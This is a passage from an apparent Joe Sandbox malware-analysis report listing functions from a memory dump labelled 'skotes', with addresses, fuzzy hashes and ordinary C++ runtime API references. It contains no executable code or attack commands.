                                                • ___std_exception_copy.LIBVCRUNTIME ref: 007224BE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ___std_exception_copy
                                                • String ID:
                                                • API String ID: 2659868963-0
                                                • Opcode ID: 5f040e6dc8d7c1eb15493ce9f0f97b2302e7d6a7102b0840eb2d34cf82c62deb
                                                • Instruction ID: 3cc34ddab1bc53e639523bf80937450f9326dda755b1775ce3c7975e8a9561f7
                                                • Opcode Fuzzy Hash: 5f040e6dc8d7c1eb15493ce9f0f97b2302e7d6a7102b0840eb2d34cf82c62deb
                                                • Instruction Fuzzy Hash: 0251C1B2940606CBEB29CF68E8C57ADBBF1FB48314F24C56AD415EB252D378AD40CB51
                                                Function 007678BB Relevance: .1, Instructions: 104COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 069e10cf944485b640b4e41b4f3d955388efbe8c6e27f0a4624982769a547960
                                                • Instruction ID: cb64b108052610d80d92800ec0c69ceddce248595dc2b302dda16cdbbb5bad6d
                                                • Opcode Fuzzy Hash: 069e10cf944485b640b4e41b4f3d955388efbe8c6e27f0a4624982769a547960
                                                • Instruction Fuzzy Hash: CB21B673F2053947770CC47E8C5627DB6E1C78C641745823AE8A6EA2C1D96CD917E2E4
                                                Function 0076779B Relevance: .1, Instructions: 81COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0f928d66d0003bebd3e535b921bcb3d068aeaed20a25cd8539324260dfaf2b38
                                                • Instruction ID: fc5d75b2a67526bcf9fe53f1e4e9941944582ae9210e25bb73a049c37b320f24
                                                • Opcode Fuzzy Hash: 0f928d66d0003bebd3e535b921bcb3d068aeaed20a25cd8539324260dfaf2b38
                                                • Instruction Fuzzy Hash: B9118A33F30C255B675C816D8C1727A95D2DBD825471F533AD827E7284E994DE13D390
                                                Function 00768860 Relevance: .1, Instructions: 76COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction ID: f1023ca903ef4cdf1cc9fb7ec02adf56c4020ab2dfa84cc3ca23a04479c854e2
                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                • Instruction Fuzzy Hash: 54117D7721018343E6C4863DC8F45B7E395EBD53217AC437AC8434FB48DE2AE8419602
                                                Function 0075652B Relevance: .0, Instructions: 24COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0aa803445f6b25a907ba85f5ea5acb467744fa1b8fb95d2e4083ef5758fa3975
                                                • Instruction ID: 36c5c24f810ac539f66f71162b43986e3e5e971284aa33af048321373a575f6e
                                                • Opcode Fuzzy Hash: 0aa803445f6b25a907ba85f5ea5acb467744fa1b8fb95d2e4083ef5758fa3975
                                                • Instruction Fuzzy Hash: 2BE0EC30081148EACE257F58D809A983BA9FF51757F804826FD045B625DFA9EEA6C680
                                                Function 0075A302 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                • Instruction ID: 328582aa43f5e3a8a2ed21b16d25cdbfb705c06e7c15803f64cf7b6a10fc632f
                                                • Opcode Fuzzy Hash: e6d3f81bf9612d8360929edb31d8ce1375adbaa32f41a7c69d112e79a3c508fb
                                                • Instruction Fuzzy Hash: D5E08C32921228FBCB14DB98C9089DAF3ECEB49B05B6501A6F901D3150C2B4DE08C7D0
                                                Function 00722EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Mtx_unlock$Cnd_broadcast
                                                • String ID:
                                                • API String ID: 32384418-0
                                                • Opcode ID: 9c1011f1bb1644d9dc167d09ebfa13f03657ffc75abd429ba218a182afc59598
                                                • Instruction ID: 30b93360a26c443d9c6663f8c9e4404ce3edc1bb10969215cbc8ce234a34e3e7
                                                • Opcode Fuzzy Hash: 9c1011f1bb1644d9dc167d09ebfa13f03657ffc75abd429ba218a182afc59598
                                                • Instruction Fuzzy Hash: 3EA115B0A00625EFEB21DF64D949B5AB7B8FF14310F048129E815D7242EB3DEA14CBE1
                                                Function 00737A00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                Download Yara Rule
                                                APIs
                                                • __Cnd_unregister_at_thread_exit.LIBCPMT ref: 00737AEC
                                                • __Cnd_destroy_in_situ.LIBCPMT ref: 00737AF8
                                                • __Mtx_destroy_in_situ.LIBCPMT ref: 00737B01
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Cnd_destroy_in_situCnd_unregister_at_thread_exitMtx_destroy_in_situ
                                                • String ID: d+x
                                                • API String ID: 4078500453-2553396873
                                                • Opcode ID: 7179e8816ead14b971c03e2963e1ca01833fc55ffd0589cfcc8ce1477356b388
                                                • Instruction ID: 24693ef0e4c2a68abe71687bc54fb6babf74dc0db01f27536d5ccb82557d9037
                                                • Opcode Fuzzy Hash: 7179e8816ead14b971c03e2963e1ca01833fc55ffd0589cfcc8ce1477356b388
                                                • Instruction Fuzzy Hash: A231E3F2A08304DBE734DF68D845A5AB7E8EF14310F104A2EE945C3243E7B9EA54C3A1
                                                Function 0075CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                                • Instruction ID: 3159f36b568f1157c5413c4f9a7d8adc5a6646116aa2b1e764666543e50fb294
                                                • Opcode Fuzzy Hash: 254d999fa369d06fd7d93151cbf4a8417e2da6d6341328512c40b930a69fa730
                                                • Instruction Fuzzy Hash: 85B10432A043859FDB168F28C8817EEBBF5EF45351F14416ADC45EB242D6B89D4ACB60
                                                Function 0073BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Xtime_diff_to_millis2_xtime_get
                                                • String ID:
                                                • API String ID: 531285432-0
                                                • Opcode ID: 7ce3507d89e97e4db6fdcd93fafd27f21f3726cbd22f6f86481fba2bc0cda943
                                                • Instruction ID: 33b060911acd758cede14b63a96e2638c0a7c13327e94fdb84109ec5f5daecfc
                                                • Opcode Fuzzy Hash: 7ce3507d89e97e4db6fdcd93fafd27f21f3726cbd22f6f86481fba2bc0cda943
                                                • Instruction Fuzzy Hash: 3A211072A00219DFEF01EBA4D8869BEB779EF48710F104015F605B7252DB389D419BA1
                                                Function 0072E360 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                Download Yara Rule
                                                APIs
                                                • std::_Xinvalid_argument.LIBCPMT ref: 0072E4F9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2654348620.0000000000721000.00000040.00000001.01000000.00000007.sdmp, Offset: 00720000, based on PE: true
                                                • Associated: 00000005.00000002.2654321792.0000000000720000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654348620.0000000000782000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654425243.0000000000789000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000078B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.000000000091E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.00000000009FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A29000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A30000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2654448303.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2655471476.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657251875.0000000000BE2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000005.00000002.2657280854.0000000000BE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_720000_skotes.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Xinvalid_argumentstd::_
                                                • String ID: L1x$invalid stoi argument
                                                • API String ID: 909987262-1995411823
                                                • Opcode ID: 14d033741e7e7b4959cf2395a01f5d59c56a4cb712008076c000d9baf3d656bc
                                                • Instruction ID: abac6b8f0658a11c27ac0d8f032f1d1b27d61db5fda05f21a4b41af5370b1edb
                                                • Opcode Fuzzy Hash: 14d033741e7e7b4959cf2395a01f5d59c56a4cb712008076c000d9baf3d656bc
                                                • Instruction Fuzzy Hash: 73F096B1940314EBD720AB6CAC0A95733E8EB45B11F118425FD1497252FB7C6D04C7E7